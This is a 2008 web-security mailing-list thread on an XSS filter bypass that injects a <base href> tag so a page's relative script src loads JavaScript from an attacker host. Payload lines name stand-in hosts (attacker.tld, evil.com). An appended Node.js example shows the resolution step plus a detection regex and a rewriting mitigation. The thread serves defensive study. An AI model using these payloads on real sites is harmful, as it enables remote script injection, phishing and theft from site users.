
Re: [WEB SECURITY] Nice little XSS trick




http://i8jesus.com/?p=10 (Jan 2008)


I also presented this vector last year at OWASP San Jose when I demo'ed
AntiSamy as an example of dangerous content that isn't malicious code on
its own. That's one of the selling points of AntiSamy - it stops not
only XSS (well, we hope) but also prevents phishing attacks that abuse
HTML/CSS.

I talked about it with RSnake afterwards and he had some crazy reason
for not putting it on his cheatsheet - claimed it was too much like the
<base href="javascript:foo();//"> vector. As noted on my blog post, IE7
is no longer (according to policy) supposed to be honoring <base> tags
outside of <HEAD>, but FF is still vulnerable. You could use this to
hijack anything - stylesheets (more XSS/phishing), images, scripts, etc.
The only thing <base> won't help you steal as far as resources is
anything gathered in JavaScript.

I think some of the big players had this figured out already (or more
likely, just got really lucky). MySpace takes <base href> values, base64
encodes them, and redirects them through another domain. The flow is
like this for them:

1. User puts in <base href="http://evil.com">

2. Str = base64("http://evil.com")

3. Profile = <base href="http://msplinks.com/redir?<base64encodedStr>

Maybe there's a way to abuse that, but I don't think so. And eBay
doesn't have any relative links after user content, at least when I
first looked at this last year. They probably both just got lucky. =]

Arshan

---------- Previous message ----------

From: Amit Klein <aksecurity@gmail.com>

Date: Tue, Jul 15, 2008 at 7:33 AM

Subject: [WEB SECURITY] Nice little XSS trick

To: Web Security <websecurity@webappsec.org>

Hi list

Recently I've been thinking about bypassing anti-XSS filters, and a nice
little trick occurred to me, which I haven't seen anywhere (e.g. it's
not on RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does
mention BASE, but not the trick I describe here). The idea is to use the
HTML BASE tag to force loading of JS code from the attacker's host.
Consider a page with an XSS vulnerability such as:

<html>
...
***XSS code may be embedded here***
...
<script src="/foo/bar.js"></script>
...
</html>

Now, an attacker can inject <base href="http://www.attacker.tld/">, and
next thing you know, the browser (IE, at least) loads the JS from
http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
"explicit" JS code involved in the payload itself.

Note that according to the HTML standard, BASE should be placed in the
HEAD section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
This is indeed observed by FF 2, but not by IE (checked IE6).

Thanks,

-Amit
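
As an added example (not code from either poster), the following Node.js snippet shows the resolution step Amit describes, a defensive check for <base> in user-supplied fragments that a "no script, no javascript:" filter would miss, and the MySpace-style rewrite from Arshan's reply. The page URL, sample fragments and the redirector host are constructed for illustration.

```javascript
// Added example (not from the thread). Shows why an injected <base> redirects a
// later relative <script src>, and two defensive checks a filter can apply.
// PAGE_URL, INJECTED and the redirector host are constructed/hypothetical.

// What the browser does with a relative src once a <base href> is in effect:
// the src is resolved against the base, not against the document's own URL.
function resolveScriptSrc(documentUrl, baseHref, relativeSrc) {
  const base = baseHref ? new URL(baseHref, documentUrl) : new URL(documentUrl);
  return new URL(relativeSrc, base).href;
}

// Defensive check: flag any <base> element in a user-supplied fragment even
// though it carries no script content. Tolerates odd casing, extra whitespace
// and attributes other than href; \b keeps <basefont> from matching.
const BASE_TAG = /<\s*base\b[^>]*>/i;
function containsBaseTag(fragment) {
  return BASE_TAG.test(fragment);
}

// The mitigation the reply attributes to MySpace: keep the tag but route its
// href through a redirector on another domain, base64-encoding the original.
// The redirector host here is a hypothetical placeholder.
function rewriteBaseHref(fragment, redirector = 'https://redir.example.invalid/redir?') {
  return fragment.replace(/<\s*base\b([^>]*?)href\s*=\s*["']([^"']+)["']([^>]*)>/gi,
    (_m, before, href, after) => {
      const encoded = Buffer.from(href, 'utf8').toString('base64');
      return `<base${before}href="${redirector}${encoded}"${after}>`;
    });
}

// Constructed sample: the vulnerable page from the original post, with the
// injected base from the post's walk-through.
const PAGE_URL = 'http://www.example.test/profile';
const INJECTED = '<base href="http://www.attacker.tld/">';

console.log(resolveScriptSrc(PAGE_URL, null, '/foo/bar.js'));                       // site's own bar.js
console.log(resolveScriptSrc(PAGE_URL, 'http://www.attacker.tld/', '/foo/bar.js')); // hijacked
console.log(containsBaseTag(INJECTED), containsBaseTag('<b>hello</b>'));            // true false
console.log(rewriteBaseHref(INJECTED));                                             // neutralised tag
```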





Brought to you by http://www.webappsec.org